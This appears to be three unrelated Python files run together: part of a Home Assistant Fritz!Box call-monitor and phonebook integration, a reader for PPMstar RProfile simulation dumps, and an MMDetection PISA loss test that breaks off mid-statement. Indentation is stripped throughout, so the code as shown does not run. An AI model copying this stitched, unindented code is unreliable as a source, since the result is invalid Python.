att = {"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime}
att["to_name"] = self._sensor.number_to_name(att["to"])
self._sensor.set_attributes(att)
elif line[1] == "CONNECT":
self._sensor.set_state(VALUE_CONNECT)
att = {"with": line[4], "device": line[3], "accepted": isotime}
att["with_name"] = self._sensor.number_to_name(att["with"])
self._sensor.set_attributes(att)
elif line[1] == "DISCONNECT":
self._sensor.set_state(VALUE_DISCONNECT)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
class FritzBoxPhonebook:
"""This connects to a FritzBox router and downloads its phone book."""
def __init__(self, host, port, username, password,
phonebook_id=0, prefixes=None):
"""Initialize the class."""
self.host = host
self.username = username
self.password = password
self.port = port
self.phonebook_id = phonebook_id
self.phonebook_dict = None
self.number_dict = None
self.prefixes = prefixes or []
# pylint: disable=import-error
import fritzconnection as fc
# Establish a connection to the FRITZ!Box.
self.fph = fc.FritzPhonebook(
address=self.host, user=self.username, password=self.password)
if self.phonebook_id not in self.fph.list_phonebooks:
raise ValueError("Phonebook with this ID not found.")
self.update_phonebook()
@Throttle(MIN_TIME_PHONEBOOK_UPDATE)
def update_phonebook(self):
"""Update the phone book dictionary."""
self.phonebook_dict = self.fph.get_all_names(self.phonebook_id)
self.number_dict = {re.sub(r'[^\d\+]', '', nr): name
for name, nrs in self.phonebook_dict.items()
for nr in nrs}
_LOGGER.info("Fritz!Box phone book successfully updated")
def get_name(self, number):
"""Return a name for a given phone number."""
number = re.sub(r'[^\d\+]', '', str(number))
if self.number_dict is None:
return 'unknown'
try:
return self.number_dict[number]
except KeyError:
pass
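# Fall back to each configured prefix, trying the number both as given and
# with its leading zero stripped.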
if self.prefixes:
for prefix in self.prefixes:
try:
return self.number_dict[prefix + number]
except KeyError:
pass
try:
return self.number_dict[prefix + number.lstrip('0')]
except KeyError:
pass
return 'unknown'
|
|
# -*- coding: utf-8 -*-
"""
This module provides a simple interface into RProfile-01-????.bobaaa files
generated by the PPMstar code
"""
from __future__ import division
from __future__ import print_function
from builtins import str
from builtins import range
from past.utils import old_div
from builtins import object
import struct
import logging
import os
import re
import sys
try:
import numpy as np
except ImportError:
print("numpy is required for reading rprofiles")
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger('rp_info')
log.setLevel(logging.DEBUG)
center_types = [(k, 'f8') for k in ('phi', 'theta', 'x', 'y', 'z')]
normal_types = [(k, 'f8') for k in ('x', 'y', 'z')]
class rprofile_set(object):
def __init__(self, source, **kwargs):
"""Load a set of RProfiles. Can pass a `path` to a set of files, or a list of `files`. Passing
the `lazy=True` makes everything operate only from disk, without loading things into memory
(for large datasets).
`source` is the path to a directory containing profiles or a list of RProfile files to open
`stride` the iteration increment. Every `stride` element is looked at during iteration. Default is 1.
`first_dump` the first dump to iterate from or None
`last_dump` the last dump to iterate through (inclusive)
There is no `.get` method... you must iterate through the files like this:
.. code-block:: python
:linenos:
rp_set = lcse.rprofile_set(targetpath, lazy=True, logging=True)
for rp in rp_set:
rp.get("fv_hi")
rp.get_table("fv")
"""
self.path = source
self.files = source if isinstance(source, list) else []
self.lazy = kwargs.get('lazy', True)
self.stride = kwargs.get('stride', 1)
self.first_dump = kwargs.get('first_dump')
self.last_dump = kwargs.get('last_dump')
self._logging = kwargs.get('logging')
self.log = log if self._logging else None
self.ray_profiles = {}
self._current_ix = 0
self._current = None
if self.path:
self.files = self.get_file_list_for_path(self.path) if os.path.isdir(self.path) else [self.path]
dump_re = re.compile(r'(.*)-([\d]{4})\.bobaaa')
self.dump_map = dict((int(dump_re.match(f).groups()[1]), f) for f in self.files if dump_re.match(f))
self.file_map = dict((f, int(dump_re.match(f).groups()[1])) for f in self.files if dump_re.match(f))
self.dumps = list(self.dump_map.keys())
self.dumps.sort()
def __iter__(self):
self._current_ix = self.dumps.index(self.first_dump) if self.first_dump else 0
return self
# Python 2 compatibility alias; iteration itself is implemented in __next__.
def next(self):
return self.__next__()
def __next__(self):
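"""Return the next rprofile in dump order, honouring first_dump, last_dump and stride; instances are cached on the set unless lazy is enabled."""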
if self._current_ix < len(self.dumps):
dump = self.dumps[self._current_ix]
if self.last_dump and dump > self.last_dump:
raise StopIteration()
rp = self.ray_profiles.get(dump, rprofile(self.dump_map[dump], lazy=self.lazy, logging=self._logging))
if not self.lazy and (dump not in self.ray_profiles):
self.ray_profiles[dump] = rp
self._current = rp
self._current_ix += self.stride
return rp
else:
raise StopIteration()
# def reset(self):
#
# if first_dump:
# self.start = self.dumps.index(first_dump)
#
# self._current_ix = self.start
# self._current = None
def get_dump(self, dump=None):
""" Get a new `rprofile` instance for `dump`. These are NOT cached internally."""
if self.dumps and dump is None:
dump = self.dumps[-1]
elif dump not in self.dump_map:
return None
return self.ray_profiles.get(dump, rprofile(self.dump_map[dump], lazy=self.lazy, logging=self._logging))
def get_file_list_for_path(self, path):
""" Return a list of RProfiles at the given path"""
filenames = [os.path.join(path, f) for f in os.listdir(path) if f.startswith('RProfile') and f.endswith('.bobaaa')]
filenames.sort()
return filenames
# def load_files(self, filenames):
# """ Loads `filenames` """
#
# # This should add to the existing
#
# self.files = filenames
# self.files.sort()
# self.ray_profiles = [rprofile(f, lazy=self.lazy, logging=self._logging) for f in self.files]
def check_for_new(self, path=None):
"""Check path for new files"""
current_files = self.get_file_list_for_path(self.path or path)
new_files = [f for f in current_files if f not in self.files]
self.files.extend(new_files)
self.files.sort()
return len(new_files) > 0
class rprofile(object):
"""
`rprofile.header_attrs` is a dictionary of header attributes
"""
header_var_list = [
dict(name='version', pos=0, type='i'),
dict(name='cell_ct_low', pos=1, type='i'),
dict(name='nbuckets', pos=2, type='i'),
dict(name='dump', pos=3, type='i'),
dict(name='sizeof_float', pos=4, type='i'),
dict(name='has_centers', pos=5, type='i'),
dict(name='has_corners', pos=6, type='i'),
dict(name='has_normals', pos=7, type='i'),
dict(name='isrestart', pos=8, type='i', min_ver=12),
dict(name='var_ct_low', pos=9, type='i'),
dict(name='var_ct_high', pos=10, type='i'),
dict(name='cell_ct_high', pos=11, type='i'),
dict(name='ncpucores', pos=12, type='i'),
dict(name='ntxbricks', pos=13, type='i'),
dict(name='ntybricks', pos=14, type='i'),
dict(name='ntzbricks', pos=15, type='i'),
dict(name='nxteams', pos=16, type='i'),
dict(name='nyteams', pos=17, type='i'),
dict(name='nzteams', pos=18, type='i'),
dict(name='nx', pos=19, type='i'),
dict(name='ny', pos=20, type='i'),
dict(name='nz', pos=21, type='i'),
dict(name='nsugar', pos=22, type='i'),
dict(name='nbdy', pos=23, type='i'),
dict(name='nfluids', pos=24, type='i'),
dict(name='nvars', pos=25, type='i'),
dict(name='nhalfwaves', pos=26, type='i'),
dict(name='maxrad', pos=27, type='i'),
dict(name='nteamsinbunch', pos=28, type='i'),
dict(name='ndumps', pos=29, type='i'),
dict(name='ndumpstodo', pos=30, type='i'),
dict(name='nrminrad', pos=31, type='i'),
dict(name='nrmaxrad', pos=32, type='i'),
dict(name='iburn', pos=33, type='i', min_ver=12),
dict(name='imuffledbdry', pos=34, type='i', min_ver=12),
dict(name='ireflectbdry', pos=35, type='i', min_ver=12),
# fheader (the offsets are in the fheader)
dict(name='radin0', pos=0, type='f', help='Gravity completely off inside this radius'),
dict(name='radinner', pos=1, type='f', help='Gravity starts turning off inside this radius'),
dict(name='radbase', pos=2, type='f', help='Bot convect zone'),
dict(name='radtop', pos=3, type='f', help='Top convect zone'),
dict(name='radouter', pos=4, type='f', help='Grav starts turning off outside this radius'),
dict(name='radout0', pos=5, type='f', help='Gravity completely off outside this radius'),
dict(name='radmax', pos=6, type='f', help='distance from center of grid to nearest edge'),
dict(name='dlayerbot', pos=7, type='f', help='thickness of flame zone'),
dict(name='dlayertop', pos=8, type='f', help='thickness of transition @ top of convect zone'),
dict(name='totallum', pos=9, type='f'),
dict(name='grav00base', pos=10, type='f'),
dict(name='rho00base', pos=11, type='f'),
dict(name='prs00base', pos=12, type='f'),
dict(name='gammaconv', pos=13, type='f'),
dict(name='gammabelow', pos=14, type='f'),
dict(name='gammaabove', pos=15, type='f'),
dict(name='gravconst', pos=16, type='f'),
dict(name='rhoconv', pos=17, type='f'),
dict(name='rhoabove', pos=18, type='f'),
dict(name='airmu', pos=19, type='f', min_ver=13),
dict(name='cldmu', pos=20, type='f', min_ver=13),
dict(name='fkair', pos=21, type='f', min_ver=13),
dict(name='fkcld', pos=22, type='f', min_ver=13),
dict(name='atomicnoair', pos=23, type='f', min_ver=13),
dict(name='atomicnocld', pos=24, type='f', min_ver=13),
# Global T-history
dict(name='time', pos=31+0, type='f'),
dict(name='timerescaled', pos=31+1, type='f'),
dict(name='bubbleheight', pos=31+2, type='f'),
dict(name='spikeheight', pos=31+3, type='f'),
dict(name='cycl', pos=31+4, type='f', min_ver=12),
dict(name='dt', pos=31+5, type='f'),
dict(name='courmx', pos=31+6, type='f'),
dict(name='urbubmx', pos=31+7, type='f'),
dict(name='urspkmn', pos=31+8, type='f'),
dict(name='ekmx', pos=31+9, type='f'),
dict(name='ekrmx', pos=31+10, type='f'),
dict(name='ektmx', pos=31+11, type='f'),
dict(name='ekurmn', pos=31+12, type='f'),
dict(name='ekurmx', pos=31+13, type='f'),
dict(name='eiurmn', pos=31+14, type='f'),
dict(name='eiurmx', pos=31+15, type='f'),
dict(name='Hurmn', pos=31+16, type='f'),
dict(name='Hurmx', pos=31+17, type='f'),
dict(name='ekurspkmn', pos=31+18, type='f'),
dict(name='ekurbubmx', pos=31+19, type='f'),
dict(name='eiurspkmn', pos=31+20, type='f'),
dict(name='eiurbubmx', pos=31+21, type='f'),
dict(name='Hurspkmn', pos=31+22, type='f'),
dict(name='Hurbubmx', pos=31+23, type='f'),
dict(name='ekbubmx', pos=31+24, type='f'),
dict(name='ekrbubmx', pos=31+25, type='f'),
dict(name='ektbubmx', pos=31+26, type='f'),
dict(name='ekspkmx', pos=31+27, type='f'),
dict(name='ekrspkmx', pos=31+28, type='f'),
dict(name='ektspkmx', pos=31+29, type='f'),
# Args images
dict(name='ai_vort', pos=64+0, type='f', len=2),
dict(name='ai_divu', pos=64+2, type='f', len=2),
dict(name='ai_s', pos=64+4, type='f', len=2),
dict(name='ai_fv', pos=64+6, type='f', len=2),
dict(name='ai_rho', pos=64+8, type='f', len=2),
dict(name='ai_p', pos=64+10, type='f', len=2),
dict(name='ai_ux', pos=64+12, type='f', len=2),
dict(name='ai_uy', pos=64+14, type='f', len=2),
dict(name='ai_uz', pos=64+16, type='f', len=2),
]
def __init__(self, filename, lazy=True, **kwargs):
"""Create a ray profile reader object.
`lazy` means only the header is loaded on open
"""
logging = kwargs.get('logging')
self._filename = filename
self.lazy = lazy
self.version = None
self.bucket_count = 0
self._centers = None
self._corners = None
self._normals = None
self._cache = {}
self._variable_map = {}
self._names = []
self._data = []
self.header_attrs = {}
if logging:
import logging
logging.basicConfig(level=logging.DEBUG)
self.log = logging.getLogger('rp_info')
self.log.setLevel(logging.DEBUG)
else:
self.log = None
if str(filename).isdigit():
filename = 'RProfile-01-%04i.bobaaa' % int(filename)
if self.log: self.log.info("Opening %s" % filename)
f = open(filename, 'rb')
header = f.read(128)
'''
if header[:8] != 'LCSE:RPS':
if self.log: self.log.warn('File %s is not a new Ray Profile, try an older rp_info.py' % filename)
f.close()
raise Exception('Unsupported file version')
'''
self.version = struct.unpack("i", header[8:12])[0]
f.seek(0)
if self.version < 8:
raise Exception('Unsupported version %i' % self.version)
elif self.version == 8:
self._header_size = 128
hlen = 8
self.header_var_list = self.header_var_list[:8]
# header = struct.unpack(hlen * "i", header[8:8+4*hlen])
# self.header_attrs['version'] = header[0]
# self.header_attrs['cell_ct_low'] = header[1]
# self.header_attrs['nbuckets'] = header[2]
# self.header_attrs['dump'] = header[3]
# self.header_attrs['sizeof_float'] = header[4]
# self.header_attrs['has_centers'] = header[5]
# self.header_attrs['has_corners'] = header[6]
# self.header_attrs['has_normals'] = header[7]
elif self.version > 8:
self._header_size = 1024
hlen = 127
header = f.read(self._header_size)
# Bug fixes
# Using the header info from v9
# if self.version < 11:
# self._init_v9()
# self._init_legacy()
# raw_header = struct.unpack(hlen * "i", header[8:8+4*hlen])
# raw_fheader = struct.unpack(hlen * "f", header[8+4*hlen:8+8*hlen])
# self.header_attrs.update([(k, raw_header[i]) for i, k in enumerate(self._header_names)])
# self.header_attrs.update([(k, raw_fheader[i]) for i, k in enumerate(self._fheader_names)])
# self.header_attrs.update([(k, raw_fheader[32 + i]) for i, k in enumerate(self._fheader_names2)])
# self.header_attrs.update([(k, (raw_fheader[64 + 2*i], raw_fheader[64 + 2*i + 1] )) for i, k in enumerate(self._argsimg_names)])
#elif self.version <= 12:
hmap = dict(i=struct.unpack(hlen * "i", header[8 : 8 + 4 * hlen]),
f=struct.unpack(hlen * "f", header[8 + 4 * hlen : 8 * (1 + hlen)]))
for var in self.header_var_list:
name = var['name']
pos = var['pos']
var_type = var['type']
var_len = var.get('len', 1)
min_ver = var.get('min_ver', 0)
if self.version < min_ver:
continue
# A slight offset problem
if self.version == 11 and var_type == 'f' and pos > 30: # and pos < 64:
pos = pos + 1
attr = hmap[var_type][pos] if var_len == 1 else hmap[var_type][pos : pos + var_len]
self.header_attrs[name] = attr
# Fix header problems
if self.version == 8:
self.header_attrs['cell_ct_high'] = 2 * self.header_attrs['cell_ct_low']
self.header_attrs['var_ct_high'] = 1
self.header_attrs['var_ct_low'] = 14
if self.version == 9:
self.header_attrs['cell_ct_low'] -= 2
self.header_attrs['cell_ct_high'] -= 4
if self.version < 12:
self.header_attrs['isreflectbdry'] = 1
self.header_attrs['ismuffledbdry'] = 0
if self.version > 13:
self.header_attrs['has_corners'] = False
self.bucket_count = self.header_attrs['nbuckets']
self.dump = self.header_attrs['dump']
self.buckets = self.header_attrs['nbuckets']
if self.version > 10:
self._init_v11()
if not self.lazy:
f = open(self._filename, 'rb')
self._data = f.read()
f.close()
else:
self._init_legacy()
if self.version == 8:
self._init_v8()
else:
self._init_v9()
for k in ['has_centers', 'has_corners', 'has_normals']:
self.header_attrs[k] = self.header_attrs.get(k, 0) == 1
float_type = 'f8' if self.header_attrs.get('sizeof_float') == 8 else 'f4'
self._dtypes_hi = [('j_hi', 'i4')]
self._dtypes_hi.extend([(n, float_type) for n in self._names_hi])
self._col_names_hi = ['j_hi'] + self._names_hi
self._dtypes = [('j', 'i4')]
self._dtypes.extend([(n, float_type) for n in self._names])
self._col_names = ['j'] + self._names
if self.lazy:
log.warn("Lazy Loading not supported for v %i" % self.version)
self._load(f)
f.close()
def _load(self, f):
nbuckets = self.header_attrs.get('nbuckets')
cell_ct_low = self.header_attrs.get('cell_ct_low')
cell_ct_high = self.header_attrs.get('cell_ct_high')
# Read the high resolution table
self._data_hi = np.fromfile(f, dtype=self._dtypes_hi, count=cell_ct_high*(nbuckets+1))
# Read the low resolution table
self._data_low = np.fromfile(f, dtype=self._dtypes, count=cell_ct_low*(nbuckets+1))
if self.header_attrs.get('has_centers'):
vals = 3 if self.version > 12 else 5
self._centers = np.fromfile(f, dtype=np.float64, count=vals * nbuckets).reshape((vals, -1), order='F')
if self.header_attrs.get('has_normals'):
self._normals = np.fromfile(f, dtype=np.float64, count=9*nbuckets).reshape((3, 3, -1), order='F')
if self.header_attrs.get('has_corners'):
self._corners = np.fromfile(f, dtype=np.float64, count=9*nbuckets).reshape((3, 3, -1), order='F')
def get_centers(self):
""" Get centers of the buckets as an array of x, y, z """
if self._centers is None and self.version >= 11:
self._centers = self._get_array('centers')
if self.version < 13:
centers = self._centers[2:]
self._centers = old_div(-centers, np.sqrt((centers * centers).sum(0)))
return self._centers
def get_corners(self):
""" Get corners of the buckets as an array of (xyz,side #, bucket #) """
if self._corners is None and self.version >= 11:
normals = self.get_normals()
self._corners = np.zeros((3, 3, normals.shape[2]))
self._corners[:,0,:] = np.cross(normals[:,0,:], normals[:,1,:], axis=0)
self._corners[:,1,:] = np.cross(normals[:,1,:], normals[:,2,:], axis=0)
self._corners[:,2,:] = np.cross(normals[:,2,:], normals[:,0,:], axis=0)
self._corners[:,:,:] /= np.sqrt((self._corners * self._corners).sum(0))
return self._corners
def get_normals(self):
""" Get normals of the buckets as an array of (x/y/z coordinate, side #, bucket #).
"""
if self._normals is None and self.version >= 11:
self._normals = self._get_array('normals')
normals_len = np.sqrt((self._normals * self._normals).sum(0))
normals_ix = normals_len > 0.0
self._normals[:, normals_ix] = old_div(self._normals[:, normals_ix], normals_len[normals_ix])
return self._normals
def get_cell_volumes(self):
"""
Get an array of dimension (`cell_ct_low`, `bucket_ct`) containing the volume of each
totopo-shaped cell.
"""
volumes = []
ys = self.get('y')
normals = self.get_normals()
a, b, c = normals[:,0,:], normals[:,1,:], normals[:,2,:]
ang_a = np.pi - np.arccos((a * b).sum(0))
ang_b = np.pi - np.arccos((b * c).sum(0))
ang_c = np.pi - np.arccos((c * a).sum(0))
angles = np.vstack([ang_a, ang_b, ang_c])
dr = (ys[1] - ys[0])
r_sq = dr * (ys**2)
bucket_angles = angles.sum(0) - np.pi
for i in range(0, self.bucket_count):
vols = r_sq * bucket_angles[i]
volumes.append(vols.reshape((-1,1)))
return np.hstack(volumes)
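# Example (hedged sketch): combining the geometry accessors above. Shapes follow
# the code in this class; `rp` is an rprofile instance with nbuckets > 0.
#
#   centers = rp.get_centers()        # (3, nbuckets) unit vectors toward each bucket
#   normals = rp.get_normals()        # (3, 3, nbuckets) side normals
#   vols = rp.get_cell_volumes()      # (cell_ct_low, nbuckets) per-cell volumes
#   per_bucket = vols.sum(axis=0)     # total volume in each bucket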
def get_table(self, var):
"""Get a table of dimension (4, ncells, nbuckets+1) containg all buckets
(including the global average bucket zero). The first dimension contains the
statastical information: average, min, max, sd.
"""
if var not in self._variable_names:
print('Variable %s not found in table. Available variables are %s' % (var, self._variable_names))
return
if self.version >= 11:
return self._get_array(var)
else:
return self._get_legacy(var)
def get(self, var):
"""Get the global bucket for variable `var` or get header attribute `var`.
Use `get_table(self, var)` to get the same variable but for all buckets.
If the global bucket is returned, the result is an array of dimension (4, ncells).
The first dimension contains avg, min, max, sd.
"""
if var in self.header_attrs:
return self.header_attrs.get(var)
if self.version >= 11:
return self._get_array(var, global_only=True)
else:
return self._get_legacy(var, global_only=True)
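# Example (hedged sketch): header attributes vs. profile variables. The filename
# below is hypothetical; 'rho' is assumed to be among get_variables().
#
#   rp = rprofile('RProfile-01-0123.bobaaa')
#   nbuckets = rp.get('nbuckets')     # plain header attribute
#   rho = rp.get('rho')               # global bucket, shape (4, ncells): avg, min, max, sd
#   rho_all = rp.get_table('rho')     # all buckets, shape (4, ncells, nbuckets + 1)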
def _get_array(self, var, global_only=False):
if var not in self._variable_map:
return None
if var in self._cache:
return self._cache[var]
offset, dtype, count, shape = self._variable_map[var]
# print self._variable_map[var], global_only
if global_only and len(shape) == 3 and shape[2] == self.bucket_count + 1:
count = shape[0] * shape[1]
shape = shape[:2]
if self.lazy:
f = open(self._filename, 'rb')
f.seek(offset)
data = np.fromfile(f, dtype=dtype, count=count).reshape(shape, order='F')
f.close()
else:
data = np.frombuffer(self._data[offset:], dtype=dtype,
count=count).reshape(shape, order='F')
if not global_only:
self._cache[var] = data
return data
def _get_legacy(self, var, global_only=False):
if var in self._col_names_hi:
data_array = self._data_hi
radial = self.header_attrs.get('cell_ct_high')
elif var in self._col_names:
radial = self.header_attrs.get('cell_ct_low')
data_array = self._data_low
else:
#print var, self._col_names_hi, self._col_names, self.header_attrs
raise Exception("Attribute '%s' not found, look in .get_variables() and .get_attributes()" % var)
if var in self._legacy_remap:
remap_vars = self._legacy_remap[var]
data_out = np.zeros((len(remap_vars), radial, self.bucket_count + 1), order='F')
var_array = []
for i, v in enumerate(remap_vars):
data_out[i,:,:] = data_array[:][v].reshape((radial, -1), order='F')
data = data_out
else:
data = data_array[:][var].reshape((radial, -1), order='F')
if var in ['y', 'j', 'j_hi', 'y_hi']:
data = data[:,0]
elif global_only:
data = data[:,:,0]
# The old format was backwards
if self.version < 9:
if len(data.shape) == 3:
data = data[:,::-1,:]
elif len(data.shape) == 2:
data = data[:,::-1]
else:
data = data[::-1]
return data
def get_attributes(self):
attrs = list(self.header_attrs.keys())
attrs.sort()
return attrs
def get_variables(self):
return self._variable_names
def _init_v8(self):
self._header_names = ['version', 'nradial_low', 'nbuckets', 'dump',
'sizeof_float', 'has_centers', 'has_corners', 'has_normals']
self._names_hi = ['y_hi', 'fv_hi', 'fvmn_hi', 'fvmx_hi', 'fvsd_hi']
self._names = ['counts', 'y',
'fv', 'fvmn','fvmx','fvsd',
'rho', 'rhomn', 'rhomx', 'rhosd',
'rhourbubble', 'rhourbubblemn', 'rhourbubblemx', 'rhourbubblesd',
'rhourspike', 'rhourspikemn', 'rhourspikemx', 'rhourspikesd',
'p', 'pmn', 'pmx', 'psd',
'ux','uxmn','uxmx','uxsd',
'uy', 'uymn', 'uymx', 'uysd',
'uz', 'uzmn', 'uzmx', 'uzsd',
'ekr', 'ekrmn','ekrmx','ekrsd',
'ekt','ektmn','ektmx','ektsd',
'ek', 'ekmn','ekmx','eksd',
'ekur','ekurmn','ekurmx','ekursd',
'eiur', 'eiurmn', 'eiurmx', 'eiursd',
'hur', 'hurmn', 'hurmx', 'hursd']
self._header_arrays = ['normals', 'centers', 'corners']
def _init_v9(self):
self._init_v8()
self._names.extend(['ceul', 'ceulmn', 'ceulmx', 'ceulsd',
'mach', 'machmn', 'machmx', 'machsd',
'enuc', 'enucmn', 'enucmx', 'enucsd',
'fnuc', 'fnucmn', 'fnucmx', 'fnucsd',
'dy', 'dymn', 'dymx', 'dysd'])
def _init_legacy(self):
''' Initialize internals for old versions (< 11)'''
buckets_total = 1 + self.bucket_count
var_ct_high = self.header_attrs.get('var_ct_high')
var_ct_low = self.header_attrs.get('var_ct_low')
cell_ct_high = self.header_attrs.get('cell_ct_high')
cell_ct_low = self.header_attrs.get('cell_ct_low')
sizeof_float = self.header_attrs.get('sizeof_float')
float_type = np.float64 if sizeof_float == 8 else np.float32
self._variable_list = [('centers', float_type, sizeof_float, (5, self.bucket_count)),
('normals', float_type, sizeof_float, (3, 3, self.bucket_count)),
('corners', float_type, sizeof_float, (3, 3, self.bucket_count))]
offset = self._header_size
# Integer Arrays (j, h_hi)
offset += 4 * buckets_total * (cell_ct_high + cell_ct_low)
# Float array, yav + counts + 4 * nvars. No high counts
offset += 8 * buckets_total * ((1 + 4 * var_ct_high) * cell_ct_high + (2 + 4 * var_ct_low) * cell_ct_low)
for name, dtype, sizeof, shape in self._variable_list:
count = np.prod(shape)
size = sizeof * count
self._variable_map[name] = (offset, dtype, count, shape)
offset += size
self._variable_names = list(self._variable_map.keys())
self._variable_names.sort()
# Variable meta
self._legacy_remap = dict(fv_hi=('fv_hi', 'fvmn_hi','fvmx_hi','fvsd_hi'),
fv=('fv', 'fvmn','fvmx','fvsd'),
rho=('rho', 'rhomn', 'rhomx', 'rhosd'),
rhourbubble=('rhourbubble', 'rhourbubblemn', 'rhourbubblemx', 'rhourbubblesd'),
rhourspike=('rhourspike', 'rhourspikemn', 'rhourspikemx', 'rhourspikesd'),
p=('p', 'pmn', 'pmx', 'psd'),
ux=('ux','uxmn','uxmx','uxsd'),
uy=('uy', 'uymn', 'uymx', 'uysd'),
uz=('uz', 'uzmn', 'uzmx', 'uzsd'),
ekr=('ekr', 'ekrmn','ekrmx','ekrsd'),
ekt=('ekt','ektmn','ektmx','ektsd'),
ek=('ek', 'ekmn','ekmx','eksd'),
ekur=('ekur','ekurmn','ekurmx','ekursd'),
eiur=('eiur', 'eiurmn', 'eiurmx', 'eiursd'),
hur=('hur', 'hurmn', 'hurmx', 'hursd'),
ceul=('ceul', 'ceulmn', 'ceulmx', 'ceulsd'),
mach=('mach', 'machmn', 'machmx', 'machsd'),
enuc=('enuc', 'enucmn', 'enucmx', 'enucsd'),
fnuc=('fnuc', 'fnucmn', 'fnucmx', 'fnucsd'),
dy=('dy', 'dymn', 'dymx', 'dysd'))
self._legacy_order = ['counts', 'y', 'fv', 'rho', 'rhourbubble', 'rhourspike',
'p', 'ux', 'uy', 'uz', 'ekr', 'ekt', 'ek', 'ekur', 'eiur', 'hur',
'ceul', 'mach', 'enuc', 'fnuc', 'dy',]
self._variable_names = list(self._variable_map.keys()) + self._legacy_order + ['fv_hi', 'y_hi']
self._variable_names.sort()
def _init_v11(self):
cell_ct_high = self.header_attrs.get('cell_ct_high')
cell_ct_low = self.header_attrs.get('cell_ct_low')
buckets_total = 1 + self.bucket_count
sizeof_float = self.header_attrs.get('sizeof_float')
float_type = np.float64 if sizeof_float == 8 else np.float32
int_type = np.int32
vals = 3 if self.version > 12 else 5
# name, size_in_bytes, <array dimensions>
self._variable_list = [('centers', float_type, sizeof_float, (vals, self.bucket_count)),
('normals', float_type, sizeof_float, (3, 3, self.bucket_count)),
('corners', float_type, sizeof_float, (3, 3, self.bucket_count)),
('j_hi', int_type, 4, (cell_ct_high,)),
('y_hi', float_type, sizeof_float, (cell_ct_high,)),
('fv_hi', float_type, sizeof_float, (4, cell_ct_high, buckets_total)),
('j', int_type, 4, (cell_ct_low,)),
('y', float_type, sizeof_float, (cell_ct_low,)),
('counts', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('fv', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('rho', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('rhobubble', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('rhospike', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('rhourbubble', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('rhourspike', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('p', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ux', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('uy', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('uz', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ceul', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('mach', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('enuc', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('fnuc', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('dy', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ekr', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ekt', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ek', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ekur', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('eiur', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('hur', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
]
# present_vars = [v['name'] for v in self.header_var_list if self.version >= v.get('min_ver', self.version)]
# TODO: HACK UGH
skip_vars = []
if self.version > 12:
skip_vars.append('corners')
offset = self._header_size
for name, dtype, sizeof, shape in self._variable_list:
if name in skip_vars:
continue
# print (name, offset, dtype, sizeof, shape)
count = np.prod(shape)
size = sizeof * count
self._variable_map[name] = (offset, dtype, count, shape)
offset += size
# print (name, offset, dtype, count, shape, sizeof)
self._variable_names = list(self._variable_map.keys())
self._variable_names.sort()
def main():
'''Simple demo main function'''
if len(sys.argv) < 2:
print("Specify filename")
return
path = sys.argv[1]
if os.path.isdir(path):
rp_set = rprofile_set(sys.argv[1])
print(rp_set.ray_profiles)
else:
rp = rprofile(sys.argv[1], logging=True)
rp.log.info('File version %i (real%i), with %i buckets and %i radial bins for dump %i' %
(rp.version, rp.get('sizeof_float'), rp.get('nbuckets'), rp.get('cell_ct_low'), rp.get('dump')))
header_keys = list(rp.header_attrs.keys())
header_keys.sort()
for k in header_keys:
print("%s: %s" % (k, rp.header_attrs[k]))
d = rp.get('fv')
print(d)
# print rp.get('j_hi', bucket=0)
print(rp.get_table('y'))
return
print("ceul")
print(rp.get('ceul'))
print("mach")
print(rp.get('mach'))
print("enuc")
print(rp.get('enuc'))
print("fnuc")
print(rp.get('fnucmx'))
print("dy")
print(rp.get('dy'))
if __name__ == "__main__":
main()
|
|
# Copyright (c) OpenMMLab. All rights reserved.
import mmcv
import torch
from mmdet.models.dense_heads import PISARetinaHead, PISASSDHead
from mmdet.models.roi_heads import PISARoIHead
def test_pisa_retinanet_head_loss():
"""Tests pisa retinanet head loss when truth is empty and non-empty."""
s = 256
img_metas = [{
'img_shape': (s, s, 3),
'scale_factor': 1,
'pad_shape': (s, s, 3)
}]
cfg = mmcv.Config(
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
match_low_quality=True,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
isr=dict(k=2., bias=0.),
carl=dict(k=1., bias=0.2),
allowed_border=0,
pos_weight=-1,
debug=False))
self = PISARetinaHead(num_classes=4, in_channels=1, train_cfg=cfg)
# Anchor head expects multiple levels of features per image
feat = [
torch.rand(1, 1, s // (2**(i + 2)), s // (2**(i + 2)))
for i in range(len(self.anchor_generator.strides))
]
cls_scores, bbox_preds = self.forward(feat)
# Test that empty ground truth encourages the network to predict background
gt_bboxes = [torch.empty((0, 4))]
gt_labels = [torch.LongTensor([])]
gt_bboxes_ignore = None
empty_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
# When there is no truth, the cls loss should be nonzero but there should
# be no box loss.
empty_cls_loss = empty_gt_losses['loss_cls'].sum()
empty_box_loss = empty_gt_losses['loss_bbox'].sum()
assert empty_cls_loss.item() > 0, 'cls loss should be non-zero'
assert empty_box_loss.item() == 0, (
